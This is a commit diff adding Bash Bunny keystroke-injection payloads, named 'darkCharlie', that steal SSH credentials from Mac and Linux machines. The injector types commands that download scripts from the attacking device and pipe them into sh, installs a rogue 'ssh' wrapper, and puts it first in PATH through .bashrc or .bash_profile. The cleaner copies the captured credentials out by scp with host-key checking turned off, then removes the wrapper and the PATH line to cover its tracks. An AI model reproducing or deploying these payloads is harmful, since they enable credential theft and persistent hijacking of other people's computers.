Now with injection and cleaning

payloads/library/credentials/darkCharlie/cleaner/payload.txt

@@ -0,0 +1,66 @@
+#!/bin/bash
+
+# Title:     darkCharlie{Cleaner}
+# Author:    Michael Weinstein
+# Target:    Mac/Linux
+# Version:   0.1
+#
+# Get the ssh creds from our loot collection.
+# And clean up after
+#
+# White            |  Ready
+# Blue blinking    |  Attacking
+# Green            |  Finished
+
+LED SETUP
+
+#setup the attack on macos (if false, attack is for Linux)
+mac=false
+
+if [ "$mac" = true ]
+then
+    ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E
+else
+    ATTACKMODE ECM_ETHERNET HID
+fi
+
+DUCKY_LANG us
+
+GET SWITCH_POSITION
+GET HOST_IP
+
+cd /root/udisk/payloads/$SWITCH_POSITION/
+LOOT=/root/udisk/loot/darkCharlie
+mkdir -p $LOOT
+
+LED ATTACK
+
+if [ "$mac" = true ]
+then
+    RUN OSX terminal
+else
+    RUN UNITY xterm
+fi
+QUACK DELAY 2000
+
+QUACK STRING scp -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no \~/.config/ssh/ssh.conf root@$HOST_IP:$LOOT/\$USER.sudo.passwd  #nice hiding of known host info
+QUACK DELAY 200
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING hak5bunny
+QUACK DELAY 200
+QUACK ENTER
+QUACK DELAY 500
+if [ "$mac" = true ]
+then
+    QUACK STRING rm -rf \~/.config/ssh \&\& sed -i \'/export PATH=\\~\\/.config\\/ssh:/d\' \~/.bash_profile
+else
+    QUACK STRING rm -rf \~/.config/ssh \&\& sed -i \'/export PATH=\\~\\/.config\\/ssh:/d\' \~/.bashrc
+fi
+QUACK ENTER
+QUACK DELAY 200
+QUACK STRING exit
+QUACK DELAY 200
+QUACK ENTER
+LED SUCCESS
+#See you, space cowboy...

payloads/library/credentials/darkCharlie/injector/payload.txt

@@ -0,0 +1,79 @@
+#!/bin/bash
+
+# Title:     darkCharlie
+# Author:    Michael Weinstein
+# Target:    Mac/Linux
+# Version:   0.1
+#
+# Create a wrapper for ssh sessions that
+# will live inside ~/.config/ssh and be added
+# tn the $PATH.
+#
+# This payload was inspired greatly by SudoBackdoor
+# and much of the code here was derived (or copied
+# wholesale) from that with great thanks to oXis.
+#
+# White            |  Ready
+# Amber blinking   |  Waiting for server
+# Blue blinking    |  Attacking
+# Green            |  Finished
+
+LED SETUP
+
+#setup the attack on macos (if false, attack is for Linux)
+mac=false
+
+if [ "$mac" = true ]
+then
+    ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E
+else
+    ATTACKMODE ECM_ETHERNET HID
+fi
+
+DUCKY_LANG us
+
+GET SWITCH_POSITION
+GET HOST_IP
+
+cd /root/udisk/payloads/$SWITCH_POSITION/
+
+# starting server
+LED SPECIAL
+
+iptables -A OUTPUT -p udp --dport 53 -j DROP
+python -m SimpleHTTPServer 80 &
+
+# wait until port is listening (credit audibleblink)
+while ! nc -z localhost 80; do sleep 0.2; done
+# that was brilliant!
+
+LED ATTACK
+
+if [ "$mac" = true ]
+then
+    RUN OSX terminal
+else
+    RUN UNITY xterm
+fi
+QUACK DELAY 2000
+
+if [ "$mac" = true ]
+then
+    QUACK STRING curl "http://$HOST_IP/pre.sh" \| sh
+    QUACK STRING curl "http://$HOST_IP/darkCharlie.py" \> ~/.config/ssh/ssh
+    QUACK STRING curl "http://$HOST_IP/post.sh" \| sh
+    QUACK STRING ~/.config/ssh/ssh --initializeScript
+else
+    QUACK STRING wget -O - "http://$HOST_IP/pre.sh" \| sh  #I think wget defaults to outputting to a file and needs explicit instructions to output to STDOUT 
+    QUACK STRING wget -O - "http://$HOST_IP/darkCharlie.py" \> ~/.config/ssh/ssh  #Will test this on a mac when I finish up
+    QUACK STRING wget -O - "http://$HOST_IP/post.sh" \| sh
+    QUACK STRING ~/.config/ssh/ssh --initializeScript
+fi
+
+QUACK DELAY 200
+QUACK ENTER
+QUACK DELAY 200
+QUACK STRING exit
+QUACK DELAY 200
+QUACK ENTER
+LED SUCCESS  #The Dungeons and Dragons tattoo hath rolled a 20

payloads/library/credentials/darkCharlie/injector/post.sh

@@ -0,0 +1,9 @@
+#!/bin/bash
+
+chmod u+x ~/.config/sudo/sudo
+if [ -f ~/.bash_profile ]
+then
+    echo "export PATH=~/.config/ssh:$PATH" >> ~/.bash_profile
+else
+    echo "export PATH=~/.config/ssh:$PATH" >> ~/.bashrc
+fi

payloads/library/credentials/darkCharlie/injector/pre.sh

@@ -0,0 +1,11 @@
+#!/bin/bash
+
+if [ ! -d ~/.config/ssh ]
+then
+    mkdir -p ~/.config/ssh
+fi
+
+if [ -f  ~/.config/ssh/ssh ]
+then
+    rm  ~/.config/ssh/ssh
+fi